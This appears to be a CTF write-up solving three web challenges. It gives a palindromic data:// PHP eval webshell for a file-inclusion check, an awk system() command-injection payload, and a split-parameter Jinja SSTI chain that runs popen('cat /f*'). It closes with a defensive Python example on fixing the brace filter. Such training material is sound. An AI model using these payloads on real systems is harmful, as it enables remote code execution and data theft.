Singles Cup 1 (web)

Published: 2025-09-11 ⋅ Reads: 15 ⋅ Likes: 0

Web Sign-in

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];

if(isset($file)){
    if(strrev($file)==$file){
        include $file;
    }

}

A file-inclusion challenge with one extra twist: the string-reversal check. The included path only has to read the same backwards, so a palindromic data:// wrapper string gets through.

data://text/plain,<?php @eval($_GET[1]);?>>?;)]1[TEG_$(lave@ php?<,nialp/txet//:atad

easyPHP

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$cmd = $_POST['cmd'];
$param = $_POST['param'];

if(isset($cmd) && isset($param)){
    $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
    shell_exec($cmd);
}

A simple RCE. Only the first three characters of cmd survive, so the command has to be a three-letter one; awk fits. The param goes through escapeshellarg, so it reaches awk as a single argument, and __FILE__ is appended as the input file.

Basic form: awk 'condition {action}' filename

payload: awk 'BEGIN{system("ls");}' __FILE__

POST

cmd=awk&param=BEGIN{system("ls>a")}

Marriage Compatibility Test

User input controls the page content, so the first guess is SSTI.

The page source reveals a /source route:

def is_hacker(string):
    """What's the point of all those fancy WAFs? This one beats them: it stops SSTI outright."""
    if "{" in string and "}" in string:
        return True
    else:
        return False

The check does not look very effective, so let's fuzz it ourselves.

result?boy_name={{'&girl_name='}} goes through, because the check runs on each parameter separately and neither one contains both braces.

So we attack:

payload:?boy_name={{%27&girl_name=%27.__class__.__base__.__subclasses__()[132].__init__.__globals__.popen('cat /f*').read()}}
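The root cause is that is_hacker inspects each parameter on its own while the template is assembled from both. The example below is added here and is not the challenge's code: it models that assembly with a constructed skeleton string, shows the per-field check passing the split probe from above, and contrasts it with checking the assembled template source and with the real fix, keeping user input out of the template source entirely.

```python
import html
import re

# Assumption: the app splices both names into the template source like this.
TEMPLATE_SKELETON = "<p>{boy} and {girl}</p>"

# Constructed request: the split probe from the writeup, benign on its own.
SPLIT_PROBE = {"boy_name": "{{'", "girl_name": "'}}"}

def is_hacker(string):
    """The challenge's check: a single field must contain BOTH braces."""
    return "{" in string and "}" in string

def original_waf_allows(params):
    """Per-field check, as in the challenge. Each half passes on its own."""
    return not any(is_hacker(v) for v in params.values())

def build_template(params):
    """Models the vulnerable pattern: user input becomes template *source*."""
    return TEMPLATE_SKELETON.format(boy=params["boy_name"],
                                    girl=params["girl_name"])

# Jinja's statement, expression and comment delimiters.
JINJA_DELIMS = re.compile(r"\{\{|\{%|\{#")

def hardened_waf_allows(params):
    """Check the string the engine will actually parse, not the fields."""
    return JINJA_DELIMS.search(build_template(params)) is None

def safe_render(params):
    """The real fix: the template stays static and input is inserted as
    escaped data after parsing, so braces can never become template syntax."""
    return TEMPLATE_SKELETON.format(boy=html.escape(params["boy_name"]),
                                    girl=html.escape(params["girl_name"]))

if __name__ == "__main__":
    print("per-field check allows split probe:", original_waf_allows(SPLIT_PROBE))
    print("assembled-source check allows it:  ", hardened_waf_allows(SPLIT_PROBE))
    print("safe render output:", safe_render(SPLIT_PROBE))
```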

